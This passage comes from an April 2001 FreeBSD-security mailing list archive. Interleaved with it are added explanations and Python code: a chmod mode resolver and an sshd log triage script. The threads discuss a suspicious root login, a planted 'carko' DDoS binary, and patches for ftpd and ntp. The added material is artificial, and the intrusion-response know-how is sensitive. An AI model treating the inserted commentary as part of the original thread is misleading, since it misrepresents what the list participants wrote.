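def is_valid_mode_spec(spec):
    """True only if the whole string is a symbolic clause list or an octal
    mode; a trailing comma or stray text is rejected (the match is anchored)."""
    return bool(SYMBOLIC_RE.match(spec) or NUMERIC_RE.match(spec))


def resolve_mode(spec, base=0o755, is_dir=True):
    """Permission bits chmod(1) would leave on an entry whose current mode is
    `base` after applying `spec`. Octal specs replace the bits outright."""
    if not is_valid_mode_spec(spec):
        raise ValueError(f"invalid mode spec: {spec!r}")
    if NUMERIC_RE.match(spec):
        return int(spec, 8) & 0o7777
    mode = base & 0o7777
    for clause in spec.split(","):
        who, op, perms = re.match(r"^([ugoa]+)([+\-=])([rwxX]*)$", clause).groups()
        who_mask = 0
        for w in who:
            who_mask |= _WHO_MASK[w]
        bits = 0
        for p in perms:
            if p == "X":
                # X grants search/execute only on directories or on files that
                # already carry an execute bit (assumption: evaluated against
                # the mode as it stands when the clause is applied)
                if is_dir or mode & 0o111:
                    bits |= _PERM_BITS["x"]
            else:
                bits |= _PERM_BITS[p]
        bits &= who_mask
        if op == "+":
            mode |= bits
        elif op == "-":
            mode &= ~bits
        else:  # '=' replaces the whole class
            mode = (mode & ~who_mask) | bits
    return mode


def describe_home(mode):
    """What a home directory mode lets group members and everyone else do.
    'list' (read bit) reveals file names; 'traverse' (search bit) lets a path
    that is already known, such as ~user/public_html, be opened without
    listing the home directory itself."""
    def caps(shift):
        bits = (mode >> shift) & 0o7
        return {"list": bool(bits & 4), "write": bool(bits & 2), "traverse": bool(bits & 1)}
    return {"group": caps(3), "other": caps(0)}


if __name__ == "__main__":
    for spec in ("u+wrX,go-w", "go-rwx", "u=rwX,go=x", "751"):
        m = resolve_mode(spec)
        print(f"{spec:12} -> {m:04o} other={describe_home(m)['other']}")
```

Applied to a freshly created 0755 directory, `u+wrX,go-w` leaves it at 0755, which is why the patch's default does not by itself close a home directory; `u=rwX,go=x` gives 0711 (traverse but no listing for everyone else), and 0751 additionally lets the user's group list the directory.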
From: Jonas Luster To: freebsd-security@freebsd.org Subject: Re: Latency of security notifications Message-ID: <20010418133708.A74145@netwarriors.org> Mail-Followup-To: Jonas Luster , freebsd-security@freebsd.org References: <3ADCF89E.14CD5D37@ursine.com> <200104180245.f3I2jtT17721@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104180245.f3I2jtT17721@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Wed, Apr 18, 2001 at 12:45:54PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Mark.Andrews@nominum.com sez: > > with XYZ. An official security announcement will be forthcoming > > shortly with the recommended fixes. In the meantime, please > > subscribe to and read the freebsd-security mailing list for the > > latest news on this issue. > > This approach doesn't work. I was not on the freebsd-security > list when the ntpd bugtraq message went out. I found it > impossible to see the *recent* traffic on the list that I > had missed. | For further information: | | * See the archived thread at | * See bugtraq at | and | * Subscribe to freebsd-security at | | The Security Officer will announce fixes and workarounds as they are | found and/or implemented. jonas -- I always find it amusing when two worlds supposedly built on logic (the law and digital computers) collide producing paradoxes which would make philosophers lose their minds. 
;-) --Chris Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 14:44:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id B1F9637B422 for ; Wed, 18 Apr 2001 14:44:20 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f3ILiCT30134; Thu, 19 Apr 2001 07:44:12 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104182144.f3ILiCT30134@drugs.dv.isc.org> To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG 
From: Mark.Andrews@nominum.com Subject: Re: Latency of security notifications In-reply-to: Your message of "Wed, 18 Apr 2001 08:47:49 MST." <3ADDB725.56C1BE83@ursine.com> Date: Thu, 19 Apr 2001 07:44:12 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Mark.Andrews@nominum.com wrote: > > Michael Bryan wrote: > > > The FreeBSD security team has been notified of a problem > > > with XYZ. An official security announcement will be forthcoming > > > shortly with the recommended fixes. In the meantime, please > > > subscribe to and read the freebsd-security mailing list for the > > > latest news on this issue. > > > > This approach doesn't work. I was not on the freebsd-security > > list when the ntpd bugtraq message went out. I found it > > impossible to see the *recent* traffic on the list that I > > had missed. > > > > This is not to say that it can't be made to work. Just that > > we are not at a stage where this is the correct response. > > Does this address your concern? I see all recent list traffic here, including > your message: > > http://docs.freebsd.org/mail/current/freebsd-security.html > > The "early alert" message could easily include that URL, which would help > people find any recent discussion missed before subscribing. (Or just > view via the web interface without even subscribing.) > > Mail from previous weeks can be found here: > > http://docs.freebsd.org/mail/archive/2001/freebsd-security/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message This is a case of "if you know it is there you can find it". Mark -- Mark Andrews, Nominum Inc. 
1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 16:50:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13601.mail.yahoo.com (web13601.mail.yahoo.com [216.136.175.112]) by hub.freebsd.org (Postfix) with SMTP id 448E637B423 for ; Wed, 18 Apr 2001 16:50:08 -0700 (PDT) (envelope-from nictan72@yahoo.com.sg) Message-ID: <20010418235008.66296.qmail@web13601.mail.yahoo.com> Received: from [165.21.83.211] by web13601.mail.yahoo.com; Thu, 19 Apr 2001 07:50:08 CST Date: Thu, 19 Apr 2001 07:50:08 +0800 (CST) 
From: Nicholas Tan Subject: Re: sshd hacked? To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, This happened earlier, I'm running 4.2-stable: Apr 19 07:22:54 web sshd[35725]: log: ROOT LOGIN as 'root' from phix-it.com Apr 19 07:27:34 web sshd[35725]: fatal: Local: Command terminated on signal 9. How is this possible? Nicholas. __________________________________________________ Do You Yahoo!? Yahoo! Invites – Get the whole gang together! http://invites.yahoo.com.sg/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 17: 1:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 0FEEB37B422 for ; Wed, 18 Apr 2001 17:01:50 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id 4E43613706; Wed, 18 Apr 2001 17:04:20 -0700 (PDT) Message-ID: <006901c0c864$42874520$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: "Nicholas Tan" , References: <20010418235008.66296.qmail@web13601.mail.yahoo.com> Subject: Re: sshd hacked? Date: Wed, 18 Apr 2001 17:04:09 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Perhaps someone or you modified your sshd config? - ----- Original Message ----- 
From: "Nicholas Tan" To: Sent: Wednesday, April 18, 2001 4:50 PM Subject: Re: sshd hacked? > Hi, > > This happened earlier, I'm running 4.2-stable: > > Apr 19 07:22:54 web sshd[35725]: log: ROOT LOGIN as > 'root' from phix-it.com > Apr 19 07:27:34 web sshd[35725]: fatal: Local: Command > terminated on signal 9. > > How is this possible? > > Nicholas. > > __________________________________________________ > Do You Yahoo!? > Yahoo! Invites - Get the whole gang together! > http://invites.yahoo.com.sg/ > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use iQA/AwUBOt4rdlCmU62pemyaEQK5kwCfZd8A/HxWv3MXoEUipQ1OF2kS4dAAoPCc Wpnqbau2Yc3c3/mVeMyRkCe4 =AW3Q -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 17:50: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from pi.yip.org (yip.org [199.45.111.121]) by hub.freebsd.org (Postfix) with ESMTP id D783337B422; Wed, 18 Apr 2001 17:50:04 -0700 (PDT) (envelope-from melange@yip.org) Received: from localhost (melange@localhost) by pi.yip.org (8.11.1/8.11.1) with ESMTP id f3J0o3U58204; Wed, 18 Apr 2001 20:50:04 -0400 (EDT) (envelope-from melange@yip.org) Date: Wed, 18 Apr 2001 20:50:03 -0400 (EDT) 
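Nicholas's two log lines show a root login from an unfamiliar host followed, five minutes later, by the same sshd process dying on SIGKILL. As an added example that is not part of the thread, the Python below parses sshd syslog lines of that shape, flags any root login whose source is outside an allow-list, and flags a root session that ends in a signal rather than a normal close. The two lines from the report are used verbatim; the other log lines, the allow-list, and the "Closing connection" wording are constructed for the example, and which messages your sshd version actually emits is an assumption to check against your own logs.

```python
import re

# Syslog line as the report shows it: "Apr 19 07:22:54 web sshd[35725]: <msg>"
SSHD_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$")
# Message shapes taken from the two lines in the report
ROOT_LOGIN = re.compile(r"ROOT LOGIN as '(?P<user>[^']+)' from (?P<src>\S+)")
SIGNAL_DEATH = re.compile(r"fatal: Local: Command terminated on signal (?P<sig>\d+)")

# Constructed sample: one expected root login that closes normally, the two
# lines from the report, and a non-sshd line the parser must ignore.
SAMPLE_LOG = [
    "Apr 19 06:58:10 web sshd[35610]: log: ROOT LOGIN as 'root' from 10.0.0.5",
    "Apr 19 07:02:44 web sshd[35610]: log: Closing connection to 10.0.0.5",
    "Apr 19 07:22:54 web sshd[35725]: log: ROOT LOGIN as 'root' from phix-it.com",
    "Apr 19 07:27:34 web sshd[35725]: fatal: Local: Command terminated on signal 9.",
    "Apr 19 07:28:00 web cron[35800]: (root) CMD (/usr/libexec/atrun)",
]


def parse_sshd(lines):
    """Yield {ts, host, pid, msg} for sshd lines; anything else is skipped."""
    for line in lines:
        m = SSHD_LINE.match(line)
        if m:
            yield m.groupdict()


def triage(lines, trusted_sources):
    """Return alerts as (kind, pid, source, timestamp).

    A root login is flagged when its source is not in trusted_sources. A root
    session whose sshd child dies on a signal is flagged regardless of source:
    a session that is being cleaned up, or an sshd being replaced, does not
    end that way in normal operation. Sessions are keyed by sshd pid, which is
    what ties the two lines in the report together (pids recycle, so a long
    log should also be split by timestamp)."""
    alerts = []
    root_sessions = {}  # sshd pid -> source of the root login it logged
    for rec in parse_sshd(lines):
        m = ROOT_LOGIN.search(rec["msg"])
        if m:
            root_sessions[rec["pid"]] = m.group("src")
            if m.group("src") not in trusted_sources:
                alerts.append(("root-login-untrusted", rec["pid"], m.group("src"), rec["ts"]))
            continue
        m = SIGNAL_DEATH.search(rec["msg"])
        if m and rec["pid"] in root_sessions:
            alerts.append(("root-session-killed", rec["pid"], root_sessions[rec["pid"]], rec["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG, trusted_sources={"10.0.0.5"}):
        print(alert)
```

Run against the sample, the trusted login from 10.0.0.5 produces nothing, while the phix-it.com session yields two alerts, one for the login and one for the kill. A root login you did not make, followed by the session's sshd being killed, is an indicator of compromise rather than a configuration puzzle; beyond the sshd config Jason points at, the things to compare against a known-good copy are root's authorized_keys, the sshd binary and its host keys.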
From: Bob K To: security@FreeBSD.ORG, stable@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) In-Reply-To: <200104181209.JAA64497@ns1.via-net-works.net.ar> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 18 Apr 2001, Fernando Schapachnik wrote: > In an earlier message, Chris Faulhaber wrote: > > > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? > > > > > > > The advisory patch is missing the glob.h patch along with the > > instruction to copy the resulting glob.h to /usr/include. > > > > Quick fix is to either get the diff or entire file from > > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, > > copy the resulting file to /usr/include and build. > > Obviously, it worked. Thanks! Just wanted to report that this also worked on a 4.1-STABLE-20001016 snapshot. -- Bob | "Villain, I have done thy mother" - Shakespeare, Titus Andronicus, act IV, scene II To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 18:43:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from fud.indifference.org (cr597818-a.crdva1.bc.wave.home.com [24.113.89.211]) by hub.freebsd.org (Postfix) with SMTP id D0AAB37B422 for ; Wed, 18 Apr 2001 18:43:10 -0700 (PDT) (envelope-from kj@indifference.org) Received: (qmail 18833 invoked by uid 1000); 19 Apr 2001 01:43:05 -0000 Date: Wed, 18 Apr 2001 18:43:05 -0700 
From: kj To: freebsd-security@freebsd.org Subject: jail upgrade Message-ID: <20010418184305.A18763@indifference.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hey, all. I have two jails on my server. When I do a make world on the actual OS, does it matter if I upgrade the jails as well? I have changed a lot of file/dir permissions and so on, and would rather just leave the jail file systems alone. I am just wondering if I don't upgrade the jails, would things start to break? Thanks, K.J. -- http://www.indifference.org "The downfall of mankind will be his indifference...ah, but who cares." ---------- In God we trust...everything else we use X.509 ----------- 1024D/57E3FDF9 2001-04-18 KJ Hartung Key fingerprint = 1C2C 6CE7 A351 11D1 A5B0 741A DCCA 22C4 57E3 FDF9 2048g/D157ACC1 2001-04-18 --------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 19:41:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from atom.alles.or.jp (atom.alles.or.jp [210.231.151.1]) by hub.freebsd.org (Postfix) with ESMTP id 2F9A537B422 for ; Wed, 18 Apr 2001 19:41:08 -0700 (PDT) (envelope-from fukuda@alles.ad.jp) Received: from fukuda.alles.ad.jp (tokyo-gw.alles.or.jp [210.231.143.251]) by atom.alles.or.jp (8.11.1/3.7W/allesnet) with SMTP id f3J2f0E01041 for ; Thu, 19 Apr 2001 11:41:01 +0900 (JST) Message-Id: <200104190241.AA00733@fukuda.alles.ad.jp> 
From: fukuda shinichi Date: Thu, 19 Apr 2001 11:41:00 +0900 To: freebsd-security@freebsd.org Subject: unknown process MIME-Version: 1.0 X-Mailer: AL-Mail32 Version 1.11 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. I found an unknown process named "carko" today. This binary was found in /usr/share/man/mansps/ddos, and I never made a dir like ddos!! (created Apr 18 18:59). Does anyone know about this "carko"? And the very weird name "ddos"... please help me. Thank you. --------- shin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20: 2:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id A94F037B422 for ; Wed, 18 Apr 2001 20:02:24 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id CCCF466B38; Wed, 18 Apr 2001 20:02:23 -0700 (PDT) Date: Wed, 18 Apr 2001 20:02:23 -0700 
From: Kris Kennaway To: fukuda shinichi Cc: freebsd-security@FreeBSD.ORG Subject: Re: unknown process Message-ID: <20010418200223.A42227@xor.obsecurity.org> References: <200104190241.AA00733@fukuda.alles.ad.jp> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104190241.AA00733@fukuda.alles.ad.jp>; from fukuda@alles.ad.jp on Thu, Apr 19, 2001 at 11:41:00AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --NzB8fVQJ5HfG6fxh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 11:41:00AM +0900, fukuda shinichi wrote: > Hi. > > I found an unknown process named "carko" today. > This binary was found in /usr/share/man/mansps/ddos, > and I never made a dir like ddos!! (created Apr 18 18:59). > > Does anyone know about this "carko"? > And the very weird name "ddos"... please help me. Take your system off the net and check it for signs of intrusion. 
Kris --NzB8fVQJ5HfG6fxh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63lU/Wry0BWjoQKURAlAwAJ40fYE17MVKQFxzBkbEO4SREtw4tQCeLAjE BB9A06a+etaWXO+LT/okIks= =o8HH -----END PGP SIGNATURE----- --NzB8fVQJ5HfG6fxh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20:24:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id 72F3737B43C for ; Wed, 18 Apr 2001 20:24:26 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id VAA14081; Wed, 18 Apr 2001 21:24:19 -0600 (MDT) Message-Id: <200104190324.VAA14081@faith.cs.utah.edu> Subject: Re: unknown process To: kris@obsecurity.org (Kris Kennaway) Date: Wed, 18 Apr 2001 21:24:19 -0600 (MDT) Cc: fukuda@alles.ad.jp (fukuda shinichi), freebsd-security@FreeBSD.ORG In-Reply-To: <20010418200223.A42227@xor.obsecurity.org> from "Kris Kennaway" at Apr 18, 2001 08:02:23 PM 
From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was an analysis of this posted to ISN today: http://www.securityfocus.com/templates/archive.pike?list=12&mid=177354 You've been hacked. Do what Kris said immediately - take your system offline, and figure out how they got in. You'll likely need to either restore from backups, do a fresh install, or check your tripwire/etc. logs to determine what else the intruder changed, whether they installed a rootkit, etc. -Dave Lo and behold, Kris Kennaway once said: > > > --NzB8fVQJ5HfG6fxh > Content-Type: text/plain; charset=us-ascii > Content-Disposition: inline > Content-Transfer-Encoding: quoted-printable > > On Thu, Apr 19, 2001 at 11:41:00AM +0900, fukuda shinichi wrote: > > Hi. > > > > I found an unknown process named "carko" today. > > This binary was found in /usr/share/man/mansps/ddos, > > and I never made a dir like ddos!! (created Apr 18 18:59). > > > > Does anyone know about this "carko"? > > And the very weird name "ddos"... please help me. > > Take your system off the net and check it for signs of intrusion. 
> > Kris > > --NzB8fVQJ5HfG6fxh > Content-Type: application/pgp-signature > Content-Disposition: inline > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iD8DBQE63lU/Wry0BWjoQKURAlAwAJ40fYE17MVKQFxzBkbEO4SREtw4tQCeLAjE > BB9A06a+etaWXO+LT/okIks= > =o8HH > -----END PGP SIGNATURE----- > > --NzB8fVQJ5HfG6fxh-- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 20:40:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from ogyo.pointer-software.com (ogyo.pointer-software.com [210.164.96.147]) by hub.freebsd.org (Postfix) with ESMTP id C1EB437B42C for ; Wed, 18 Apr 2001 20:40:13 -0700 (PDT) (envelope-from horio@pointer-software.com) Received: from long.near.this (long.near.this [10.0.172.9]) by ogyo.pointer-software.com (8.11.1/8.11.1) with ESMTP id f3J3eAF32195; Thu, 19 Apr 2001 12:40:10 +0900 (JST) Received: from pointer-software.com (char.near.this [10.0.172.11]) by long.near.this (8.11.1/8.9.3) with ESMTP id f3J3e9P54853; Thu, 19 Apr 2001 12:40:09 +0900 (JST) Message-ID: <3ADE5E18.270D87F4@pointer-software.com> Date: Thu, 19 Apr 2001 12:40:08 +0900 
From: horio shoichi X-Mailer: Mozilla 4.76 [ja] (X11; U; Linux 2.2.18pre21 i686) X-Accept-Language: en, ja MIME-Version: 1.0 To: fukuda shinichi Cc: freebsd-security@FreeBSD.ORG Subject: Re: unknown process References: <200104190241.AA00733@fukuda.alles.ad.jp> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See the incidents@securityfocus.com archive of this week. horio shoichi fukuda shinichi wrote: > > Hi. > > I found unknown process name "carko" today. > This binary is found in /usr/share/man/mansps/ddos , > and I never made such dir like ddos !! (created Apr 18 18:59). > > Does anyone know about this "carko" ? > And very weird name "ddos" ... please help me. > > Thank you . > > --------- > shin > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:22: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id AB88937B43E for ; Wed, 18 Apr 2001 21:21:57 -0700 (PDT) (envelope-from subs@ovk.altai.ru) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id LAA35778 for ; Thu, 19 Apr 2001 11:21:53 +0700 (NOVST) (envelope-from subs@ovk.altai.ru) Date: Thu, 19 Apr 2001 11:21:53 +0700 (NOVST) 
From: "Yuri A. Wolf" X-Sender: subs@proxy.obk.ru To: freebsd-security@freebsd.org Subject: ntp-4.0.99k23? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to ntp-4.0.99k23. Is the 1st one vulnerable? Is the 2d one ok? -- Yuri Wolf wolf@ovk.altai.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:27:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from casimir.physics.purdue.edu (casimir.physics.purdue.edu [128.210.146.111]) by hub.freebsd.org (Postfix) with ESMTP id 4259837B422 for ; Wed, 18 Apr 2001 21:27:40 -0700 (PDT) (envelope-from will@physics.purdue.edu) Received: by casimir.physics.purdue.edu (Postfix, from userid 1000) id 9B6CE1BD72; Wed, 18 Apr 2001 23:25:16 -0500 (EST) Date: Wed, 18 Apr 2001 23:25:16 -0500 
From: Will Andrews To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? Message-ID: <20010418232516.V5017@casimir.physics.purdue.edu> Reply-To: Will Andrews References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="4cokgWgqjr3t8EL1" Content-Disposition: inline User-Agent: Mutt/1.3.15i In-Reply-To: ; from subs@ovk.altai.ru on Thu, Apr 19, 2001 at 11:21:53AM +0700 X-Operating-System: Linux 2.2.18 sparc64 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --4cokgWgqjr3t8EL1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 19, 2001 at 11:21:53AM +0700, Yuri A. Wolf wrote: > After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to > ntp-4.0.99k23. > > Is the 1st one vulnerable? Is the 2d one ok? Neither is vulnerable. -- wca --4cokgWgqjr3t8EL1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE63misF47idPgWcsURAsH+AJ9a6jEQi14LrKu0z6Af5/9k5cfJywCcCngZ iZMxVyY8emfOP54KwfMVwGs= =t0eV -----END PGP SIGNATURE----- --4cokgWgqjr3t8EL1-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:32:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 4692637B423 for ; Wed, 18 Apr 2001 21:32:34 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id VAA09506; Wed, 18 Apr 2001 21:31:44 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda09504; Wed Apr 18 21:31:43 2001 Received: (from uucp@localhost) by 
passer.osg.gov.bc.ca (8.11.2/8.9.1) id f3J4Vcv42443; Wed, 18 Apr 2001 21:31:38 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdW42323; Wed Apr 18 21:31:03 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f3J4V3S54698; Wed, 18 Apr 2001 21:31:03 -0700 (PDT) Message-Id: <200104190431.f3J4V3S54698@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdB54674; Wed Apr 18 21:30:40 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: "Yuri A. Wolf" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntp-4.0.99k23? In-reply-to: Your message of "Thu, 19 Apr 2001 11:21:53 +0700." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 18 Apr 2001 21:30:40 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Yuri A. Wolf" writes: > Hello > > After I upgraded to ntp-4.0.99k_2 I noted that ntp port changed again to > ntp-4.0.99k23. > > Is the 1st one vulnerable? Is the 2d one ok? Both are invulnerable. 4.0.99k_2 is patched by the port (see the files directory) to fix the vulnerability. 4.0.99k23 has the patches for the vulnerability built into it. In the end both are equivalent. Regards, Cy Schubert Team Leader, Sun/Alpha Team Open Systems Group, ITSD, ISTA Province of BC Phone: (250)387-8437 Fax: (250)387-5766 Internet: Cy.Schubert@osg.gov.bc.ca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 18 21:40: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.OBK.ru (ovk.barrt.ru [194.84.233.130]) by hub.freebsd.org (Postfix) with ESMTP id 2422037B422 for ; Wed, 18 Apr 2001 21:39:58 -0700 (PDT) (envelope-from subs@ovk.altai.ru) Received: from localhost (subs@localhost) by proxy.OBK.ru (8.9.3/8.9.3) with ESMTP id LAA36543; Thu, 19 Apr 2001 11:38:48 +0700 (NOVST) (envelope-from subs@ovk.altai.ru) Date: Thu, 19 Apr 2001 11:38:48 +0700 (NOVST) 
